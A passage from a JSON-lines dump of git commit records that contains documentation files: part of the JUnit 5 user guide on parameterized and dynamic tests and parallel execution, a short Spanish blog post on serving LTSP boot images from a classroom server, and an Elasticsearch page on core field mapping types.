`\"\/path\/to\/file\"` -> `Paths.get(\"\/path\/to\/file\")`\n| `java.time.Instant` | `\"1970-01-01T00:00:00Z\"` -> `Instant.ofEpochMilli(0)`\n| `java.time.LocalDateTime` | `\"2017-03-14T12:34:56.789\"` -> `LocalDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000)`\n| `java.time.LocalDate` | `\"2017-03-14\"` -> `LocalDate.of(2017, 3, 14)`\n| `java.time.LocalTime` | `\"12:34:56.789\"` -> `LocalTime.of(12, 34, 56, 789_000_000)`\n| `java.time.OffsetDateTime` | `\"2017-03-14T12:34:56.789Z\"` -> `OffsetDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.time.OffsetTime` | `\"12:34:56.789Z\"` -> `OffsetTime.of(12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.time.YearMonth` | `\"2017-03\"` -> `YearMonth.of(2017, 3)`\n| `java.time.Year` | `\"2017\"` -> `Year.of(2017)`\n| `java.time.ZonedDateTime` | `\"2017-03-14T12:34:56.789Z\"` -> `ZonedDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.util.Currency` | `\"JPY\"` -> `Currency.getInstance(\"JPY\")`\n| `java.util.Locale` | `\"en\"` -> `new Locale(\"en\")`\n| `java.util.UUID` | `\"d043e930-7b3b-48e3-bdbe-5a3ccfb833db\"` -> `UUID.fromString(\"d043e930-7b3b-48e3-bdbe-5a3ccfb833db\")`\n|===\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit-fallback]]\n====== Fallback String-to-Object Conversion\n\nIn addition to implicit conversion from strings to the target 
types listed in the above\ntable, JUnit Jupiter also provides a fallback mechanism for automatic conversion from a\n`String` to a given target type if the target type declares exactly one suitable _factory\nmethod_ or a _factory constructor_ as defined below.\n\n- __factory method__: a non-private, `static` method declared in the target type that\n accepts a single `String` argument and returns an instance of the target type. The name\n of the method can be arbitrary and need not follow any particular convention.\n- __factory constructor__: a non-private constructor in the target type that accepts a\n single `String` argument. Note that the target type must be declared as either a\n top-level class or as a `static` nested class.\n\nNOTE: If multiple _factory methods_ are discovered, they will be ignored. If a _factory\nmethod_ and a _factory constructor_ are discovered, the factory method will be used\ninstead of the constructor.\n\nFor example, in the following `@ParameterizedTest` method, the `Book` argument will be\ncreated by invoking the `Book.fromTitle(String)` factory method and passing `\"42 Cats\"`\nas the title of the book.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_fallback_conversion_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_fallback_conversion_example_Book]\n----\n\n[[writing-tests-parameterized-tests-argument-conversion-explicit]]\n===== Explicit Conversion\n\nInstead of relying on implicit argument conversion you may explicitly specify an\n`ArgumentConverter` to use for a certain parameter using the `@ConvertWith` annotation\nlike in the following example. Note that an implementation of `ArgumentConverter` must be\ndeclared as either a top-level class or as a `static` nested class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_conversion_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_conversion_example_ToStringArgumentConverter]\n----\n\nExplicit argument converters are meant to be implemented by test and extension authors.\nThus, `junit-jupiter-params` only provides a single explicit argument converter that may\nalso serve as a reference implementation: `JavaTimeArgumentConverter`. It is used via the\ncomposed annotation `JavaTimeConversionPattern`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_java_time_converter]\n----\n\n[[writing-tests-parameterized-tests-argument-aggregation]]\n==== Argument Aggregation\n\nBy default, each _argument_ provided to a `@ParameterizedTest` method corresponds to a\nsingle method parameter. Consequently, argument sources which are expected to supply a\nlarge number of arguments can lead to large method signatures.\n\nIn such cases, an `{ArgumentsAccessor}` can be used instead of multiple parameters. Using\nthis API, you can access the provided arguments through a single argument passed to your\ntest method. 
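\n\nFor instance, a minimal sketch (the CSV values are illustrative):\n\n[source,java,indent=0]\n----\n@ParameterizedTest\n@CsvSource({ \"Jane, Doe, 1985\" })\nvoid accessArguments(ArgumentsAccessor accessor) {\n\tassertEquals(\"Jane\", accessor.getString(0));\n\tassertEquals(\"Doe\", accessor.getString(1));\n\tassertEquals(1985, accessor.getInteger(2).intValue());\n}\n----\n\n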
In addition, type conversion is supported as discussed in\n<<writing-tests-parameterized-tests-argument-conversion-implicit>>.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAccessor_example]\n----\n\n_An instance of `ArgumentsAccessor` is automatically injected into any parameter of type\n`ArgumentsAccessor`._\n\n[[writing-tests-parameterized-tests-argument-aggregation-custom]]\n===== Custom Aggregators\n\nApart from direct access to a `@ParameterizedTest` method's arguments using an\n`ArgumentsAccessor`, JUnit Jupiter also supports the usage of custom, reusable\n_aggregators_.\n\nTo use a custom aggregator, implement the `{ArgumentsAggregator}` interface and register\nit via the `@AggregateWith` annotation on a compatible parameter in the\n`@ParameterizedTest` method. The result of the aggregation will then be provided as an\nargument for the corresponding parameter when the parameterized test is invoked. Note\nthat an implementation of `ArgumentsAggregator` must be declared as either a top-level\nclass or as a `static` nested class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_example_PersonAggregator]\n----\n\nIf you find yourself repeatedly declaring `@AggregateWith(MyTypeAggregator.class)` for\nmultiple parameterized test methods across your codebase, you may wish to create a custom\n_composed annotation_ such as `@CsvToMyType` that is meta-annotated with\n`@AggregateWith(MyTypeAggregator.class)`. The following example demonstrates this in\naction with a custom `@CsvToPerson` annotation.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_with_custom_annotation_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_with_custom_annotation_example_CsvToPerson]\n----\n\n\n[[writing-tests-parameterized-tests-display-names]]\n==== Customizing Display Names\n\nBy default, the display name of a parameterized test invocation contains the invocation\nindex and the `String` representation of all arguments for that specific invocation.\nHowever, you can customize invocation display names via the `name` attribute of the\n`@ParameterizedTest` annotation like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=custom_display_names]\n----\n\nWhen executing the above method using the `ConsoleLauncher` you will see output similar to the following.\n\n....\nDisplay name of container \u2714\n\u251c\u2500 1 ==> first='foo', second=1 \u2714\n\u251c\u2500 2 ==> first='bar', second=2 \u2714\n\u2514\u2500 3 ==> first='baz, qux', second=3 \u2714\n....\n\nThe following placeholders are supported within custom display names.\n\n[cols=\"20,80\"]\n|===\n| Placeholder | Description\n\n| `{index}` | the current invocation index (1-based)\n| `{arguments}` | the complete, comma-separated arguments list\n| `{0}`, `{1}`, ... | an individual argument\n|===\n\n\n[[writing-tests-parameterized-tests-lifecycle-interop]]\n==== Lifecycle and Interoperability\n\nEach invocation of a parameterized test has the same lifecycle as a regular `@Test`\nmethod. 
For example, `@BeforeEach` methods will be executed before each invocation.\nSimilar to <<writing-tests-dynamic-tests>>, invocations will appear one by one in the\ntest tree of an IDE. You may mix regular `@Test` methods and `@ParameterizedTest`\nmethods at will within the same test class.\n\nYou may use `ParameterResolver` extensions with `@ParameterizedTest` methods. However,\nmethod parameters that are resolved by argument sources need to come first in the\nargument list. Since a test class may contain regular tests as well as parameterized\ntests with different parameter lists, values from argument sources are not resolved for\nlifecycle methods (e.g. `@BeforeEach`) and test class constructors.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ParameterResolver_example]\n----\n\n\n[[writing-tests-test-templates]]\n=== Test Templates\n\nA `{TestTemplate}` method is not a regular test case but rather a template for test\ncases. As such, it is designed to be invoked multiple times depending on the number of\ninvocation contexts returned by the registered providers. Thus, it must be used in\nconjunction with a registered `{TestTemplateInvocationContextProvider}` extension. Each\ninvocation of a test template method behaves like the execution of a regular `@Test`\nmethod with full support for the same lifecycle callbacks and extensions. Please refer to\n<<extensions-test-templates>> for usage examples.\n\n\n[[writing-tests-dynamic-tests]]\n=== Dynamic Tests\n\nThe standard `@Test` annotation in JUnit Jupiter described in\n<<writing-tests-annotations>> is very similar to the `@Test` annotation in JUnit 4. Both\ndescribe methods that implement test cases. These test cases are static in the sense that\nthey are fully specified at compile time, and their behavior cannot be changed by\nanything happening at runtime. _Assumptions provide a basic form of dynamic behavior but\nare intentionally rather limited in their expressiveness._\n\nIn addition to these standard tests, a completely new kind of test programming model has\nbeen introduced in JUnit Jupiter. This new kind of test is a _dynamic test_ which is\ngenerated at runtime by a factory method that is annotated with `@TestFactory`.\n\nIn contrast to `@Test` methods, a `@TestFactory` method is not itself a test case but\nrather a factory for test cases. Thus, a dynamic test is the product of a factory.\nTechnically speaking, a `@TestFactory` method must return a single `DynamicNode` or a\n`Stream`, `Collection`, `Iterable`, `Iterator`, or array of `DynamicNode` instances.\nInstantiable subclasses of `DynamicNode` are `DynamicContainer` and `DynamicTest`.\n`DynamicContainer` instances are composed of a _display name_ and a list of dynamic child\nnodes, enabling the creation of arbitrarily nested hierarchies of dynamic nodes.\n`DynamicTest` instances will be executed lazily, enabling dynamic and even\nnon-deterministic generation of test cases.\n\nAny `Stream` returned by a `@TestFactory` will be properly closed by calling\n`stream.close()`, making it safe to use a resource such as `Files.lines()`.\n\nAs with `@Test` methods, `@TestFactory` methods must not be `private` or `static` and may\noptionally declare parameters to be resolved by `ParameterResolvers`.\n\nA `DynamicTest` is a test case generated at runtime. It is composed of a _display name_\nand an `Executable`.
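\n\nFor example, assuming a static import of `DynamicTest.dynamicTest`, a minimal sketch of\na factory that produces two such tests could look like this (display names and assertions\nare illustrative).\n\n[source,java,indent=0]\n----\n@TestFactory\nStream<DynamicTest> dynamicTestsSketch() {\n\treturn Stream.of(\n\t\tdynamicTest(\"length\", () -> assertEquals(5, \"junit\".length())),\n\t\tdynamicTest(\"upper case\", () -> assertEquals(\"JUNIT\", \"junit\".toUpperCase())));\n}\n----\n\n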
`Executable` is a `@FunctionalInterface` which means that the\nimplementations of dynamic tests can be provided as _lambda expressions_ or _method\nreferences_.\n\n.Dynamic Test Lifecycle\nWARNING: The execution lifecycle of a dynamic test is quite different than it is for a\nstandard `@Test` case. Specifically, there are no lifecycle callbacks for individual\ndynamic tests. This means that `@BeforeEach` and `@AfterEach` methods and their\ncorresponding extension callbacks are executed for the `@TestFactory` method but not for\neach _dynamic test_. In other words, if you access fields from the test instance within a\nlambda expression for a dynamic test, those fields will not be reset by callback methods\nor extensions between the execution of individual dynamic tests generated by the same\n`@TestFactory` method.\n\nAs of JUnit Jupiter {jupiter-version}, dynamic tests must always be created by factory\nmethods; however, this might be complemented by a registration facility in a later\nrelease.\n\nWARNING: Dynamic tests are currently an _experimental_ feature. Consult the table in\n<<api-evolution-experimental-apis>> for details.\n\n[[writing-tests-dynamic-tests-examples]]\n==== Dynamic Test Examples\n\nThe following `DynamicTestsDemo` class demonstrates several examples of test factories\nand dynamic tests.\n\nThe first method returns an invalid return type. Since an invalid return type cannot be\ndetected at compile time, a `JUnitException` is thrown when it is detected at runtime.\n\nThe next five methods are very simple examples that demonstrate the generation of a\n`Collection`, `Iterable`, `Iterator`, or `Stream` of `DynamicTest` instances. Most of\nthese examples do not really exhibit dynamic behavior but merely demonstrate the\nsupported return types in principle. However, `dynamicTestsFromStream()` and\n`dynamicTestsFromIntStream()` demonstrate how easy it is to generate dynamic tests for a\ngiven set of strings or a range of input numbers.\n\nThe next method is truly dynamic in nature. `generateRandomNumberOfTests()` implements an\n`Iterator` that generates random numbers, a display name generator, and a test executor\nand then provides all three to `DynamicTest.stream()`. Although the non-deterministic\nbehavior of `generateRandomNumberOfTests()` is of course in conflict with test\nrepeatability and should thus be used with care, it serves to demonstrate the\nexpressiveness and power of dynamic tests.\n\nThe last method generates a nested hierarchy of dynamic tests utilizing\n`DynamicContainer`.\n\n[source,java]\n----\ninclude::{testDir}\/example\/DynamicTestsDemo.java[tags=user_guide]\n----\n\n\n[[writing-tests-parallel-execution]]\n=== Parallel Execution\n\n.Parallel test execution is an experimental feature\nWARNING: You're invited to give it a try and provide feedback to the JUnit team so they\ncan improve and eventually <<api-evolution, promote>> this feature.\n\nBy default, JUnit Jupiter tests are run sequentially in a single thread. Running tests in\nparallel -- for example, to speed up execution -- is available as an opt-in feature since\nversion 5.3. To enable parallel execution, set the\n`junit.jupiter.execution.parallel.enabled` configuration parameter to `true` -- for\nexample, in `junit-platform.properties` (see <<running-tests-config-params>> for other\noptions).\n\nPlease note that enabling this property is only the first step required to execute tests\nin parallel. If enabled, test classes and methods will still be executed sequentially by\ndefault. 
Whether or not a node in the test tree is executed concurrently is controlled by\nits execution mode. The following two modes are available.\n\n`SAME_THREAD`::\n Force execution in the same thread used by the parent. For example, when used on a test\n method, the test method will be executed in the same thread as any `@BeforeAll` or\n `@AfterAll` methods of the containing test class.\n\n`CONCURRENT`::\n Execute concurrently unless a resource lock forces execution in the same thread.\n\nBy default, nodes in the test tree use the `SAME_THREAD` execution mode. You can change\nthe default by setting the `junit.jupiter.execution.parallel.mode.default` configuration\nparameter. Alternatively, you can use the `{Execution}` annotation to change the\nexecution mode for the annotated element and its subelements (if any) which allows you to\nactivate parallel execution for individual test classes, one by one.\n\n[source,properties]\n.Configuration parameters to execute all tests in parallel\n----\njunit.jupiter.execution.parallel.enabled = true\njunit.jupiter.execution.parallel.mode.default = concurrent\n----\n\nThe default execution mode is applied to all nodes of the test tree with a few notable\nexceptions, namely test classes that use the `Lifecycle.PER_CLASS` mode or a\n`{MethodOrderer}` (except for `{Random}`). In the former case, test authors have to\nensure that the test class is thread-safe; in the latter, concurrent execution might\nconflict with the configured execution order. Thus, in both cases, test methods in such\ntest classes are only executed concurrently if the `@Execution(CONCURRENT)` annotation is\npresent on the test class or method.\n\nAll nodes of the test tree that are configured with the `CONCURRENT` execution mode will\nbe executed fully in parallel according to the provided\n<<writing-tests-parallel-execution-config, configuration>> while observing the\ndeclarative <<writing-tests-parallel-execution-synchronization, synchronization>>\nmechanism. Please note that <<running-tests-capturing-output>> needs to be enabled\nseparately.\n\n[[writing-tests-parallel-execution-config]]\n==== Configuration\n\nProperties such as the desired parallelism and the maximum pool size can be configured\nusing a `{ParallelExecutionConfigurationStrategy}`. The JUnit Platform provides two\nimplementations out of the box: `dynamic` and `fixed`. Alternatively, you may implement a\n`custom` strategy.\n\nTo select a strategy, set the `junit.jupiter.execution.parallel.config.strategy`\nconfiguration parameter to one of the following options.\n\n`dynamic`::\n Computes the desired parallelism based on the number of available processors\/cores\n multiplied by the `junit.jupiter.execution.parallel.config.dynamic.factor`\n configuration parameter (defaults to `1`).\n\n`fixed`::\n Uses the mandatory `junit.jupiter.execution.parallel.config.fixed.parallelism`\n configuration parameter as the desired parallelism.\n\n`custom`::\n Allows you to specify a custom `{ParallelExecutionConfigurationStrategy}`\n implementation via the mandatory `junit.jupiter.execution.parallel.config.custom.class`\n configuration parameter to determine the desired configuration.\n\nIf no configuration strategy is set, JUnit Jupiter uses the `dynamic` configuration\nstrategy with a factor of `1`. 
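\n\nIf you would rather pin the pool size than scale with the hardware, the `fixed` strategy\ncan be configured as in the following sketch (the value `4` is purely illustrative).\n\n[source,properties]\n----\njunit.jupiter.execution.parallel.config.strategy = fixed\njunit.jupiter.execution.parallel.config.fixed.parallelism = 4\n----\n\nWith the default `dynamic` strategy and its factor of `1`, no such pinning takes place.\n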
Consequently, the desired parallelism will be equal to the\nnumber of available processors\/cores.\n\n.Parallelism does not imply maximum number of concurrent threads\nNOTE: JUnit Jupiter does not guarantee that the number of concurrently executing tests\nwill not exceed the configured parallelism. For example, when using one of the\nsynchronization mechanisms described in the next section, the `ForkJoinPool` that is used\nbehind the scenes may spawn additional threads to ensure execution continues with\nsufficient parallelism. Thus, if you require such guarantees in a test class, please use\nyour own means of controlling concurrency.\n\n[[writing-tests-parallel-execution-synchronization]]\n==== Synchronization\n\nIn addition to controlling the execution mode using the `{Execution}` annotation, JUnit\nJupiter provides another annotation-based declarative synchronization mechanism. The\n`{ResourceLock}` annotation allows you to declare that a test class or method uses a\nspecific shared resource that requires synchronized access to ensure reliable test\nexecution. The shared resource is identified by a unique name which is a `String`. The\nname can be user-defined or one of the predefined constants in `{Resources}`:\n`SYSTEM_PROPERTIES`, `SYSTEM_OUT`, `SYSTEM_ERR`, `LOCALE`, or `TIME_ZONE`.\n\nIf the tests in the following example were run in parallel _without_ the use of\n{ResourceLock}, they would be _flaky_. Sometimes they would pass, and at other times they\nwould fail due to the inherent race condition of writing and then reading the same JVM\nSystem Property.\n\nWhen access to shared resources is declared using the {ResourceLock} annotation, the\nJUnit Jupiter engine uses this information to ensure that no conflicting tests are run in\nparallel.\n\nIn addition to the `String` that uniquely identifies the shared resource, you may specify\nan access mode. Two tests that require `READ` access to a shared resource may run in\nparallel with each other but not while any other test that requires `READ_WRITE` access\nto the same shared resource is running.\n\n[source,java]\n----\ninclude::{testDir}\/example\/SharedResourcesDemo.java[tags=user_guide]\n----\n\n\n[[writing-tests-built-in-extensions]]\n=== Built-in Extensions\n\nWhile the JUnit team encourages reusable extensions to be packaged and maintained in\nseparate libraries, the JUnit Jupiter API artifact includes a few user-facing extension\nimplementations that are considered so generally useful that users shouldn't have to add\nanother dependency.\n\n[[writing-tests-built-in-extensions-TempDirectory]]\n==== The TempDirectory Extension\n\nThe `TempDirectory` extension can be used to create and clean up a temporary directory\nfor an individual test or all tests in a test class. To use it, register the extension\nand add a parameter of type `java.nio.file.Path` annotated with `@TempDir` to your test\nmethod, lifecycle method, or test class constructor.\n\nFor example, the following test registers the extension for a single test method, creates\nand writes to a file in the temporary directory, and checks its content.\n\n[source,java,indent=0]\n.A test method that requires a temporary directory\n----\ninclude::{testDir}\/example\/TempDirectoryDemo.java[tags=user_guide]\n----\n\nIn addition to the default file system for the local operating system, the\n`TempDirectory` extension can also be used with any `FileSystem` implementation -- for\nexample, https:\/\/github.com\/google\/jimfs[Jimfs]. 
In order to use a custom file system,\nregister the extension _programmatically_ via `@RegisterExtension` and supply a provider\nof a custom parent directory of type `Path`. The following example uses the Jimfs\n`FileSystem` and passes a custom `tmp` parent directory to the\n`createInCustomDirectory()` static factory method.\n\n[source,java]\n.A test class that configures the TempDirectory extension to use a custom file system\n----\ninclude::{testDir}\/example\/TempDirectoryWithCustomFileSystemDemo.java[tags=user_guide]\n----\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a0b607900df78702048b3fefcdf8eb6392b5db58","subject":"Update 2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","message":"Update 2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","repos":"iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io","old_file":"_posts\/2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","new_file":"_posts\/2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","new_contents":"= LTSP Images Served by the Classroom Server\n\n:published_at: 2016-01-18\n:hp-tags: LTSP, aula, aula-servidor\n:hp-image: http:\/\/www.greaterlatrobe.net\/seniorcenter\/Computer%20Classroom%2010-05.jpg\n\n\nIn the classrooms, the Classroom Servers _(the teacher's computer)_ are in charge of serving the boot image to the LTSP clients _(the students' computers)_.\n\nThe LTSP clients have the network image request feature enabled; the Classroom Server is responsible for providing internet access to the LTSP clients while also acting as the DHCP server.\n\n== LTSP Image\n\nThe files that make up the image for the LTSP clients live in\n\n----\n\/opt\/i386\n----\n\n\nThe image can be mounted on the classroom server with\n\n----\nchroot \/opt\/i386\n----\n\n== Processing the Image for LTSP\n\nThe image that is sent out is not exactly what sits in that folder; it has to go through a processing and compression step, and the resulting file is what will be sent to the LTSP clients every time they boot.\n\nTo do so, run\n\n----\nltsp-update-image --arch i386\n----\n\nOnce that process finishes, the next time the LTSP clients boot they will have the new image with the changes applied.\n","old_contents":"= LTSP Images Served by the Classroom Server\n\n:published_at: 2016-01-18\n:hp-tags: LTSP, aula, aula-servidor\n:hp-image: http:\/\/www.greaterlatrobe.net\/seniorcenter\/Computer%20Classroom%2010-05.jpg\n\n\nIn this post we will go over how the LTSP clients boot in the classrooms.\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e1a2d76626fddab44e925ef6585ad1ea4b9d54a8","subject":"Fixing typo in the first JSON example","message":"Fixing typo in the first JSON example\n\nCloses
#7172\n","repos":"kunallimaye\/elasticsearch,phani546\/elasticsearch,AleksKochev\/elasticsearch,kimimj\/elasticsearch,achow\/elasticsearch,brandonkearby\/elasticsearch,GlenRSmith\/elasticsearch,anti-social\/elasticsearch,mnylen\/elasticsearch,petmit\/elasticsearch,nknize\/elasticsearch,mm0\/elasticsearch,palecur\/elasticsearch,kingaj\/elasticsearch,diendt\/elasticsearch,tahaemin\/elasticsearch,socialrank\/elasticsearch,episerver\/elasticsearch,bestwpw\/elasticsearch,hanst\/elasticsearch,zeroctu\/elasticsearch,ulkas\/elasticsearch,iamjakob\/elasticsearch,MetSystem\/elasticsearch,gingerwizard\/elasticsearch,Shekharrajak\/elasticsearch,tahaemin\/elasticsearch,lchennup\/elasticsearch,onegambler\/elasticsearch,mikemccand\/elasticsearch,scottsom\/elasticsearch,dylan8902\/elasticsearch,mrorii\/elasticsearch,nrkkalyan\/elasticsearch,luiseduardohdbackup\/elasticsearch,kalburgimanjunath\/elasticsearch,hydro2k\/elasticsearch,vrkansagara\/elasticsearch,aglne\/elasticsearch,szroland\/elasticsearch,polyfractal\/elasticsearch,jeteve\/elasticsearch,karthikjaps\/elasticsearch,yynil\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,dylan8902\/elasticsearch,humandb\/elasticsearch,jimczi\/elasticsearch,AleksKochev\/elasticsearch,chirilo\/elasticsearch,njlawton\/elasticsearch,petabytedata\/elasticsearch,jeteve\/elasticsearch,sscarduzio\/elasticsearch,kevinkluge\/elasticsearch,Shekharrajak\/elasticsearch,i-am-Nathan\/elasticsearch,fforbeck\/elasticsearch,nilabhsagar\/elasticsearch,markwalkom\/elasticsearch,mmaracic\/elasticsearch,weipinghe\/elasticsearch,zhiqinghuang\/elasticsearch,rmuir\/elasticsearch,nazarewk\/elasticsearch,phani546\/elasticsearch,drewr\/elasticsearch,elasticdog\/elasticsearch,mnylen\/elasticsearch,ImpressTV\/elasticsearch,tahaemin\/elasticsearch,elancom\/elasticsearch,areek\/elasticsearch,mkis-\/elasticsearch,schonfeld\/elasticsearch,umeshdangat\/elasticsearch,Widen\/elasticsearch,likaiwalkman\/elasticsearch,jpountz\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,ouyangkongtong\/elasticsearch,easonC\/elasticsearch,Clairebi\/ElasticsearchClone,apepper\/elasticsearch,martinstuga\/elasticsearch,ckclark\/elasticsearch,tebriel\/elasticsearch,huanzhong\/elasticsearch,KimTaehee\/elasticsearch,cwurm\/elasticsearch,NBSW\/elasticsearch,bestwpw\/elasticsearch,janmejay\/elasticsearch,truemped\/elasticsearch,ivansun1010\/elasticsearch,Helen-Zhao\/elasticsearch,milodky\/elasticsearch,nrkkalyan\/elasticsearch,Shepard1212\/elasticsearch,jimczi\/elasticsearch,markharwood\/elasticsearch,clintongormley\/elasticsearch,rhoml\/elasticsearch,slavau\/elasticsearch,coding0011\/elasticsearch,LewayneNaidoo\/elasticsearch,lydonchandra\/elasticsearch,F0lha\/elasticsearch,Collaborne\/elasticsearch,kimimj\/elasticsearch,gmarz\/elasticsearch,masaruh\/elasticsearch,mrorii\/elasticsearch,onegambler\/elasticsearch,andrestc\/elasticsearch,avikurapati\/elasticsearch,fekaputra\/elasticsearch,gingerwizard\/elasticsearch,ESamir\/elasticsearch,alexkuk\/elasticsearch,petabytedata\/elasticsearch,brandonkearby\/elasticsearch,nomoa\/elasticsearch,petmit\/elasticsearch,ajhalani\/elasticsearch,hanst\/elasticsearch,jpountz\/elasticsearch,overcome\/elasticsearch,masterweb121\/elasticsearch,jbertouch\/elasticsearch,vvcephei\/elasticsearch,Clairebi\/ElasticsearchClone,jw0201\/elastic,C-Bish\/elasticsearch,luiseduardohdbackup\/elasticsearch,fekaputra\/elasticsearch,adrianbk\/elasticsearch,masterweb121\/elasticsearch,boliza\/elasticsearch,iacdingping\/elasticsearch,gfyoung\/elasticsearch,zkidkid\/elasticsearch,Widen\/elas
[[mapping-core-types]]
=== Core Types

Each JSON field can be mapped to a specific core type.
JSON itself already
provides us with some typing, with its support for `string`,
`integer`/`long`, `float`/`double`, `boolean`, and `null`.

The following sample tweet JSON document will be used to explain the
core types:

[source,js]
--------------------------------------------------
{
    "tweet" : {
        "user" : "kimchy",
        "message" : "This is a tweet!",
        "postDate" : "2009-11-15T14:12:12",
        "priority" : 4,
        "rank" : 12.3
    }
}
--------------------------------------------------

An explicit mapping for the above JSON tweet can be:

[source,js]
--------------------------------------------------
{
    "tweet" : {
        "properties" : {
            "user" : {"type" : "string", "index" : "not_analyzed"},
            "message" : {"type" : "string", "null_value" : "na"},
            "postDate" : {"type" : "date"},
            "priority" : {"type" : "integer"},
            "rank" : {"type" : "float"}
        }
    }
}
--------------------------------------------------

[float]
[[string]]
==== String

The text-based string type is the most basic type, and contains one or
more characters. An example mapping can be:

[source,js]
--------------------------------------------------
{
    "tweet" : {
        "properties" : {
            "message" : {
                "type" : "string",
                "store" : true,
                "index" : "analyzed",
                "null_value" : "na"
            },
            "user" : {
                "type" : "string",
                "index" : "not_analyzed",
                "norms" : {
                    "enabled" : false
                }
            }
        }
    }
}
--------------------------------------------------

The above mapping defines a `string` `message` property/field within the
`tweet` type. The field is stored in the index (so it can later be
retrieved using selective loading when searching), and it gets analyzed
(broken down into searchable terms). If the message has a `null` value,
then the value that will be stored is `na`. There is also a `string` `user`
field which is indexed as-is (not broken down into tokens) and has norms
disabled (so that matching this field is a binary decision: no match is
better than another one).
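To illustrate the difference, here is a hypothetical `term` query against
the `user` field (standard query DSL; only the sample value comes from the
document above). Because the field is `not_analyzed`, the query input is
not analyzed either, so it has to match the stored value exactly:

[source,js]
--------------------------------------------------
{
    "query" : {
        "term" : {
            "user" : "kimchy"
        }
    }
}
--------------------------------------------------

A `term` query for the capitalized form `Kimchy` would find nothing here,
while the analyzed `message` field would typically be searched with a
`match` query, which runs its input through the field's analyzer first.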
The following table lists all the attributes that can be used with the
`string` type:

[cols="<,<",options="header",]
|=======================================================================
|Attribute |Description
|`index_name` |The name of the field that will be stored in the index.
Defaults to the property/field name.

|`store` |Set to `true` to actually store the field in the index, `false` to not
store it. Defaults to `false` (note, the JSON document itself is stored,
and it can be retrieved from it).

|`index` |Set to `analyzed` for the field to be indexed and searchable
after being broken down into tokens using an analyzer. `not_analyzed`
means that it is still searchable, but is not put through the analysis
process or broken down into tokens. `no` means that it won't be
searchable at all (as an individual field; it may still be included in
`_all`). Setting to `no` disables `include_in_all`. Defaults to
`analyzed`.

|`doc_values` |Set to `true` to store field values in a column-stride fashion.
Automatically set to `true` when the <<fielddata-formats,`fielddata` format>> is `doc_values`.

|`term_vector` |Possible values are `no`, `yes`, `with_offsets`,
`with_positions`, `with_positions_offsets`. Defaults to `no`.

|`boost` |The boost value. Defaults to `1.0`.

|`null_value` |When there is a (JSON) null value for the field, use the
`null_value` as the field value. Defaults to not adding the field at
all.

|`norms: {enabled: <value>}` |Boolean value indicating whether norms should be
enabled or not. Defaults to `true` for `analyzed` fields, and to `false` for
`not_analyzed` fields. See the <<norms,section about norms>>.

|`norms: {loading: <value>}` |Describes how norms should be loaded; possible
values are `eager` and `lazy` (default). It is possible to change the default
value to `eager` for all fields by configuring the index setting
`index.norms.loading` to `eager`.

|`index_options` |Allows setting the indexing options; possible values are
`docs` (only doc numbers are indexed),
`freqs` (doc numbers and term frequencies), and `positions` (doc
numbers, term frequencies and positions). Defaults to `positions` for
`analyzed` fields, and to `docs` for `not_analyzed` fields. It
is also possible to set it to `offsets` (doc numbers, term
frequencies, positions and offsets).

|`analyzer` |The analyzer used to analyze the text contents when
`analyzed` during indexing and when searching using a query string.
Defaults to the globally configured analyzer.

|`index_analyzer` |The analyzer used to analyze the text contents when
`analyzed` during indexing.

|`search_analyzer` |The analyzer used to analyze the field when it is part of
a query string. Can be updated on an existing field.

|`include_in_all` |Should the field be included in the `_all` field (if
enabled). If `index` is set to `no` this defaults to `false`; otherwise,
it defaults to `true` or to the parent `object` type setting.

|`ignore_above` |The analyzer will ignore strings larger than this size.
Useful for generic `not_analyzed` fields that should ignore long text.

|`position_offset_gap` |Position increment gap between field instances
with the same field name. Defaults to 0.
|=======================================================================

The `string` type also supports custom indexing parameters associated
with the indexed value. For example:

[source,js]
--------------------------------------------------
{
    "message" : {
        "_value": "boosted value",
        "_boost": 2.0
    }
}
--------------------------------------------------

The mapping is required to disambiguate the meaning of the document.
Otherwise, the structure would interpret "message" as a value of type
"object". The key `_value` (or `value`) in the inner document specifies
the real string content that should eventually be indexed. The `_boost`
(or `boost`) key specifies the per-field document boost (here 2.0).

[float]
[[norms]]
===== Norms

Norms store various normalization factors that are later used (at query time)
in order to compute the score of a document relative to a query.

Although useful for scoring, norms also require quite a lot of memory
(typically on the order of one byte per document per field in your index,
even for documents that don't have this specific field). As a consequence, if
you don't need scoring on a specific field, it is highly recommended to disable
